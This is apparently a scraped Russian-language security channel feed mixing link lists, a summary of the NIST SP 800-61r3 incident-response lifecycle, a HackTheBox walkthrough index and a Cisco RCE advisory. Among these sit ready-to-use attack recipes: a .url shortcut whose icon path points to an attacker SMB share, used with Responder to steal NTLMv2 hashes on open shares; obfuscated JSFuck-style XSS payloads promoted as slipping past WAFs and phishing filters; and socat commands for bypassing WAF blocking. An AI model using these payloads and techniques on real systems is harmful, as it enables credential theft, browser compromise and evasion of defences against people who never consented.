Fsecurity | HH

🔗Ссылка: https://habr.com/ru/articles/937866/

🔗Ссылка: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/

🔗Ссылка: https://habr.com/ru/articles/937438/

🔗Ссылка: https://spy-soft.net/cloudlist-projectdiscovery

🔗Ссылка: https://habr.com/ru/articles/937460/

🔗Ссылка: https://habr.com/ru/articles/933676/

🔗Ссылка: https://bi.zone/expertise/blog/paper-werewolf-atakuet-rossiyu-s-ispolzovaniem-uyazvimosti-nulevogo-dnya-v-winrar/

🔗Ссылка: https://habr.com/ru/companies/selectel/articles/937730/

Всем привет! 💻✌️ Обратили внимание, что жизненный цикл реагирования на инциденты от NIST обновился в NIST.SP.800-61r3? Новая версия руководства интегрирована с Cybersecurity Framework (CSF) 2.0 На рисунке показана высокоуровневая модель жизненного цикла реагирования на инциденты, основанная на шести функциях: - Управление (Govern): Стратегия, ожидания и политика организации в области управления рисками кибербезопасности устанавливаются, доводятся до сведения и отслеживаются - Идентификация (Identify): анализируются текущие риски - Защита (Protect): используются меры защиты для управления рисками - Обнаружение (Detection): выявляются и анализируются возможные инциденты - Реагирование (Respond): принимаются меры по реагированию в отношении обнаруженного инцидента - Восстановление (Recover): восстанавливаются активы и процессы, затронутые инцидентом Все шесть функций взаимосвязаны и формируют непрерывный процесс, где подготовка (управление, идентификация, защита) служит фундаментом для комплексной системы защиты. Подготовка (управление, идентификация, защита) теперь выделена в отдельный этап, который не входит в процесс реагирования, но является основой для предотвращения инцидентов и снижения их последствий. Реагирование (обнаружение, реагирование, восстановление) организовано как отдельный цикл, что связано с развитием MSSP (Managed Security Service Providers) и MDR (Managed Detection and Response). Эти сервисы позволяют организациям передать на аутсорс мониторинг и реагирование на инциденты, что особенно важно для малого и среднего бизнеса. #dfir@detectioneasy

🔗Ссылка: https://github.com/arosenmund/defcon33_silence_kill_edr

🔗Ссылка: https://opennet.ru/63729/

🔗Ссылка: https://habr.com/ru/companies/bizone/articles/937142/

🔗Ссылка: https://ardent101.github.io/posts/1c/

Каждый кто увидит - окаменеет отдаст свой пароль

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей 1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы 🙈

[InternetShortcut] 
URL=RedBlue 
WorkingDirectory=notes 
IconFile=\\172.16.71.71\%USERNAME%.icon 
IconIndex=1

2. Запускаем responder, что бы принимать хэши

sudo responder -I eth0

3. Подкидываем жертве файл и рыбачим 🎣 Ждём, когда кто-то откроет папку с нашим файлом 4. БИНГО! Хэш у нас 💃 Дальше можно брутить, но это уже другая история Хинт для красных👽:

Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещаться

Хинт для синих👽:

Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt 🤣

Подписывайтесь на канал, дальше больше!

Интересные XSS пейлоады подъехали 😊

ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا],
د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")()

甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('被攻擊了')"
)()

Как это вообще работает: Идентификаторы в JavaScript могут содержать любые символы Unicode, поэтому можно использовать переменные с именами на арабском, русском, иероглифах, греческом и т.д. — это не меняет работу кода. Сам код при этом собирается из базовых примитивов (булевых значений, пустых строк, объектов), а нужные строки и функции извлекаются посимвольно по индексам из этих примитивов. (Принцип JSFuck).

![] → false
!![] → true
+[] → 0
[]+[] → "" (пустая строка)
{}+[] и прочее дают строки вроде "[object Object]"
("false"+{})[1] → "a"

И так далее — по индексации из известных значений. Полный перечень тут Таким образом можно сделать payload, который выполнится в браузере, но при этом, вероятно, не будет детектиться многими WAF (Или при фишинге). Дипсику кстати понравилось, он всё скушал Ps. для того чтобы пейлоад отработал, его нужно поместить в js контекст. Например, в тег <script> 💫 @pentestnotes

🔗Ссылка: https://opennet.ru/63727/

Заметил как то забавную вещь. В ходе пентеста получаю уведомление от скрипта из предыдущего поста, что таргет заблокировал меня, проверяю - действительно порт стал закрыт, но dirsearch на этот таргет при этом продолжает работать. Как такое может быть? Причина это Keep-alive, что использует соединение многократно. И как становится понятным фаерволы и waf могут ненадежно защищать цель, блокируя новые подключения, но забывая про уже установленные коннекты (скрин). И вот как можно попробовать сделать bypass таких waf:

socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - tcp-connect:1.2.3.4:80,keepalive,keepidle=10,keepintvl=10,keepcnt=100 > /tmp/fifo
socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - openssl:1.2.3.4:443,verify=0 > /tmp/fifo
dirsearch -u http://127.0.0.1:1234

Что бы многократно использовать одно и то же tcp-соединение и разделять его между разными утилитами (dirsearch, gobuster, etc) мы можем создать до блокировки висящее подключение. Конечно же такой коннект рано или поздно может закрыть и удаленная сторона, но сам факт того, что мы взаимодействуем с target после активации waf весьма интересен.

💻 HackTheBox Walkthrough на русском языке, огромная практическая подборка прохождения машин от RalfHacker с Хабра ➡️ Hack The Box. Уровень Easy: • Прохождение Traceback. Бэкдор, LUA, SSH. • Прохождение Omni. Ломаем легенький Windows IoT. • Прохождение Buff. RCE в CMS Gym и в CloudMe. • Прохождение Tabby. RCE в Tomcat, и повышаем привилегии через LXD. • Прохождение Blunder. Ломаем Bludit CMS. • Прохождение Remote. NFS, RCE в CMS Umbraco и LPE через UsoSvc. • Прохождение Sauna. LDAP, AS-REP Roasting, AutoLogon, DCSync атака. • Прохождение Nest. NTFS потоки, реверс C# и бродилка по SMB. • Прохождение Traverxec. RCE в веб-сервере nostromo, техника GTFOBins. • Прохождение Forest. AS-REP Roasting, атаки DCSync и Pass-The-Hash. • Прохождение Postman. Redis и WebMin. ➡️ Hack The Box. Уровень Medium: • Прохождение лаборатории Professional Offensive Operations. Пентест Active Directory. • Прохождение Monteverde. Брут SMB и LPE через Azure Admins. • Прохождение OpenKeys. Ломаем виртуалку OpenBSD. • Прохождение SneakyMailer. Фишинговая рассылка, LPE через PyPI и GTFOBins pip3. • Прохождение Fuse. RPC, принтеры и опасная привилегия SeLoadDriverPrivilege. • Прохождение Cache. RCE в OpenEMR, memcached и docker. • Прохождение Admirer. Уязвимость в Admirer и RCE через подмену переменной среды. • Прохождение Magic. Password spraying. Mysqldump и LPE через sysinfo. • Прохождение Cascade. LDAP и удаленные объекты Active Directory. • Прохождение Book. XSS to LFI через PDF и LPE через Logrotate. • Прохождение Resolute. Password spraying. От DnsAdmin до SYSTEM. • Прохождение Obscurity. OS Command Injection и Race Condition. • Прохождение Mango. NoSQL инъекция и LPE через JJS. • Прохождение Sniper. RFI и вредоносный CHM документ. • Прохождение Bitlab. Слабая JS обфускация, GIT и реверс Windows приложения. ➡️ Hack The Box. Уровень Hard: • Прохождение Compromised. RCE LiteCart и бэкдор pam_unix. • Прохождение Unbalanced. Rsync, EncFS, Squid, XPath инъекция и RCE в Pi-hole. • Прохождение Intanse. Flask, атака HLE, SQL инъекция, SNMP to RCE, Ret2Libc. • Прохождение Blackfield. Захват контроллера домена через SMB и RPC, LPE через теневую копию. • Прохождение Travel. Memcache+SSRF=RCE, LPE через LDAP. • Прохождение Quick. QUIC HTTP/3, XSLT инъекция, Race condition. • Прохождение Oouch. OAuth2, RCE в uWSGI и LPE через DBUS. • Прохождение Forwardslash. LFI, backup и шифрованный том. • Прохождение Control. SQL инъекция и LPE через права на службу. • Прохождение Registry. Docker, RCE в CMS Bolt и Restic. • Прохождение Scavenger. DNS, FTP и следы другого взлома. • Прохождение Zetta. FXP, IPv6, rsync, Postgres и SQLi. • Прохождение RE. Metasploit, нагрузка в офисном документе, Zip Slip атака, немного о PowerSploit и токенах. ➡️ Hack The Box. Уровень Insane: • Прохождение Laser. Jetdirect, RPC и кража SSH. • Прохождение Dyplesher. Memcached, Gogs, RCE через создание плагина и LPE через AMQP. • Прохождение Multimaster. Burp+Sqlmap. AD users from MSSQL. Уязвимость в VSCode. AMSI bypass и CVE ZeroLogon. • Прохождение Fatty. Реверс и рекомпиляция клиент-серверного приложения. Java десериализация. • Прохождение PlayerTwo. Twirp, 2FA bypass, Off-By-One атака. • Прохождение Rope. PWN. Форматные строки и ROP используя pwntools. • Прохождение Bankrobber. XSS, SQL инъекция, CSRF, port forwarding. #article #doc #pentest #redteam

🔗Ссылка: https://www.securitylab.ru/analytics/562397.php

Если вы думаете что в пятницу можно уже расслабиться и готовиться к выходным, то вот вам работа: Cisco Secure Firewall Management Center Software RADIUS Remote Code Execution Vulnerability could allow an unauthenticated, remote attacker to inject arbitrary shell commands that are executed by the device https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79